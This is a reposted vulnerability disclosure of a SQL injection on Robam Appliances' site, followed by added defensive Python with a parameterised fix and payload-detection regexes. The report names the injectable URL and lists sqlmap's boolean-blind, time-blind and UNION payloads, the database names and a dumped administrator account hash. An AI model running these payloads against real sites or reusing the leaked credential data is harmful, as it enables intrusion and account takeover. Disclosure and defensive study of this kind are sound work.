Robam Appliances main site SQL injection: entire database exposed

Posted by: Chloe O_o, 2015-05-18
Title: Robam Appliances main site SQL injection: entire database exposed
Affected vendor: 杭州老板电器股份有限公司 (Hangzhou Robam Appliances Co., Ltd.)
Author: 刻木
Submitted: 2015-03-14 21:22
Published: 2015-04-30 18:48
Vulnerability type: SQL injection
Severity:
Self-assessed Rank: 20
Status: vendor could not be reached, or vendor actively ignored the report
Tags:

Vulnerability details

Injection point:

http://www.robam.com/minisitea7/newsinfo.php?news_id=1113

Finding:

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: news_id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: news_id=1113 AND 5711=5711

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind (SELECT)
Payload: news_id=1113 AND (SELECT * FROM (SELECT(SLEEP(5)))dEdW)

Type: UNION query
Title: Generic UNION query (NULL) - 9 columns
Payload: news_id=-6066 UNION ALL SELECT NULL,NULL,CONCAT(0x717a717a71,0x5977756349414f716977,0x7176717171),NULL,NULL,NULL,NULL,NULL,NULL--
---
[20:09:49] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.4, PHP 5.4.16
back-end DBMS: MySQL 5.0.11

available databases [12]:
[*] bonyee
[*] dbrobamcom
[*] information_schema
[*] mysql
[*] performance_schema
[*] robam_activity
[*] robam_rec
[*] robamse
[*] robamweb
[*] sakila
[*] test
[*] world

Proof of vulnerability:

user_id	usergroup_id	name	account	password	createtime
8	1	Super Administrator	admin	$2a$10$CP8UCAqaXU06A7.E.rmsW.mBgBmrW6usumTKSiQoJ6HDFoC3IouH2	2014/3/25 17:23

[Screenshots: a.PNG, b.PNG, c.PNG]

Fix:

Tighten input filtering, or put a WAF in front of it, something like that.

Any chance of a free range hood?
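The sqlmap output above shows three payload families against news_id, and the fix section only says "filter or add a WAF". The following is an added example, not code from the original report or from the site: it rebuilds the defect and its hardened form on an in-memory SQLite table (Python stands in for the site's PHP, since the pattern is language-independent) and adds a small request-line check for the payload shapes sqlmap reported. The table name, column names and sample rows are constructed; the nine-column width matches sqlmap's "Generic UNION query (NULL) - 9 columns" finding. SQLite has no SLEEP() or CONCAT(), so the time-based probe appears only in the detection part and the UNION probe is adapted to a plain string literal.

```python
import re
import sqlite3
from urllib.parse import parse_qs, urlsplit

# Constructed stand-in for the site's news table. The 9-column width mirrors
# sqlmap's "Generic UNION query (NULL) - 9 columns" finding; names are assumptions.
SCHEMA = """
CREATE TABLE news (
    news_id INTEGER PRIMARY KEY, category TEXT, title TEXT, summary TEXT,
    body TEXT, author TEXT, created TEXT, updated TEXT, views INTEGER
);
"""
SAMPLE_ROWS = [  # constructed sample data
    (1113, "press", "Sample headline", "Summary", "Body text", "editor",
     "2015-03-01", "2015-03-02", 42),
    (1114, "press", "Another headline", "Summary", "Body text", "editor",
     "2015-03-03", "2015-03-03", 7),
]


def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    conn.executemany("INSERT INTO news VALUES (?,?,?,?,?,?,?,?,?)", SAMPLE_ROWS)
    return conn


def lookup_vulnerable(conn, news_id):
    """The defect behind the finding: the raw GET value is spliced into the SQL text."""
    return conn.execute("SELECT * FROM news WHERE news_id=" + news_id).fetchall()


NEWS_ID_RE = re.compile(r"\d{1,10}")


def lookup_safe(conn, news_id):
    """Hardened form: allow-list the value's shape, then bind it as a parameter.
    Returns None for a malformed id (the request handler would answer 400)."""
    if not NEWS_ID_RE.fullmatch(news_id):
        return None
    return conn.execute("SELECT * FROM news WHERE news_id=?", (int(news_id),)).fetchall()


# Signatures for the three payload families sqlmap reported against news_id.
PROBE_PATTERNS = [
    ("boolean-blind", re.compile(r"\bAND\s+\d+\s*=\s*\d+", re.I)),
    ("time-blind", re.compile(r"\bSLEEP\s*\(", re.I)),
    ("union", re.compile(r"\bUNION\s+(ALL\s+)?SELECT\b", re.I)),
]


def injection_indicators(request_target):
    """Decode the query string of a request target and return the payload families seen."""
    hits = set()
    for values in parse_qs(urlsplit(request_target).query).values():
        for value in values:
            for label, pattern in PROBE_PATTERNS:
                if pattern.search(value):
                    hits.add(label)
    return sorted(hits)


# Constructed request targets carrying the payloads from the sqlmap output, URL-encoded.
SAMPLE_REQUESTS = [
    "/minisitea7/newsinfo.php?news_id=1113",
    "/minisitea7/newsinfo.php?news_id=1113%20AND%205711%3D5711",
    "/minisitea7/newsinfo.php?news_id=1113%20AND%20%28SELECT%20%2A%20FROM%20%28SELECT%28SLEEP%285%29%29%29dEdW%29",
    "/minisitea7/newsinfo.php?news_id=-6066%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT%280x717a717a71%2C0x5977756349414f716977%2C0x7176717171%29%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--",
]

# SQLite has no CONCAT(); the UNION probe is adapted to a string literal so it runs here.
UNION_PROBE = "-6066 UNION ALL SELECT NULL,NULL,'qzqzqYwucIAOqiwqvqqq',NULL,NULL,NULL,NULL,NULL,NULL--"

if __name__ == "__main__":
    conn = make_db()
    print("true condition :", len(lookup_vulnerable(conn, "1113 AND 5711=5711")), "row(s)")
    print("false condition:", len(lookup_vulnerable(conn, "1113 AND 5711=5712")), "row(s)")
    print("union marker   :", lookup_vulnerable(conn, UNION_PROBE)[0][2])
    print("hardened       :", lookup_safe(conn, "1113 AND 5711=5711"))
    for target in SAMPLE_REQUESTS:
        print(injection_indicators(target) or ["-"], target[:60])
```

The vulnerable lookup returns a row for the true condition and nothing for the false one, which is exactly the oracle boolean-based blind injection relies on, and the UNION probe returns the marker string in the third column. The hardened lookup rejects anything that is not a short digit string before the database is touched, and binds the value as a parameter so the query text never changes; the regex check over decoded query values is the kind of signal a WAF rule or log search would use to spot the probes shown in the report.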

Copyright notice: please credit 刻木@乌云 when reposting.
